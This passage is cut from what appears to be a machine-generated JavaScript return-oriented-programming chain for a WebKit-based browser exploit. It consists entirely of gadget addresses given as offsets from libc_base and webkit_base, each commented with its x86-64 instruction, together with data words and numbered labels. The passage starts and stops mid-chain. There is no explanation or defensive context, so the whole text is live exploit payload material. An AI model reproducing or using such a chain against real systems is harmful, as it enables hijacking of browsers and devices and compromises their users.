libc_base+763368 //pop rcx
]);
//L913:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L914:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L915:
db([15, 0]); // 0xf
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+101544, //L916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+101560, //L917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L917:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+101648, //L919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L919:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+101704, //L920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L920:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+101776, //L923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L923:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+101832, //L924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L924:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L926:
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+101968, //L927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L929:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+102088, //L932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+102072, //L930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L930:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L932:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+102232, //L935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+102200, //L933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+102216, //L934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L933:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L934:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L935:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+102304, //L937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L937:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+102360, //L938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L938:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+102456, //L941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L940:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L941:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L942:
db([16, 0]); // 0x10
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+102552, //L943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+102568, //L944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L943:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+102656, //L946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+102712, //L947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L947:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+102784, //L950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L950:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+102840, //L951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L951:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L953:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+102976, //L954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L954:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L956:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+103096, //L959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+103080, //L957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L957:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L959:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+103240, //L962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+103208, //L960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+103224, //L961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L960:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L961:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L962:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+103312, //L964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L964:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+103368, //L965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L965:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+103464, //L968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L967:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L969:
db([17, 0]); // 0x11
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+103560, //L970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+103576, //L971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L970:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+103664, //L973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L973:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+103720, //L974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L974:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+103792, //L977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L977:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+103848, //L978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L978:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L980:
libc_base+764760, //pop rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+103984, //L981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L981:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L983:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+104104, //L986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+104088, //L984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L984:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L986:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+104248, //L989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+104216, //L987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+104232, //L988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L987:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L988:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L989:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+104320, //L991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L991:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+104376, //L992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L992:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+104472, //L995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L994:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L995:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L996:
db([18, 0]); // 0x12
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+104568, //L997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+104584, //L998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L997:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L998:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+104672, //L1000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1000:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+104728, //L1001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1001:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+104800, //L1004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1004:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+104856, //L1005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1005:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+104944, //L1007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1007:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1009:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+105064, //L1012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+105048, //L1010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1010:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1012:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+105208, //L1015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+105176, //L1013
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+105192, //L1014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1013:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1015:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+105280, //L1017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1017:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+105336, //L1018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1018:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+105432, //L1021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1020:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1022:
db([3, 0]); // 0x3
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+105528, //L1023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+105544, //L1024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1023:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1024:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+105632, //L1026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1026:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+105688, //L1027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1027:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+105792, //L1029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1029:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1031:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+105912, //L1034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+105896, //L1032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1032:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1034:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+106056, //L1037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+106024, //L1035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+106040, //L1036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1035:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1036:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1037:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+106128, //L1039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1039:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+106184, //L1040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1040:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+106280, //L1043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1042:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1043:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1044:
db([19, 0]); // 0x13
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+106376, //L1045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+106392, //L1046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1045:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+106480, //L1048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1048:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+106536, //L1049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1049:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+106608, //L1052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1052:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+106664, //L1053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1053:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1055:
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+106800, //L1056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1056:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1058:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+106920, //L1061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+106904, //L1059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1059:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1061:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+107064, //L1064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+107032, //L1062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+107048, //L1063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1062:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1063:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1064:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+107136, //L1066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1066:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+107192, //L1067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1067:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+107288, //L1070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1069:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1070:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1071:
db([20, 0]); // 0x14
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+107384, //L1072
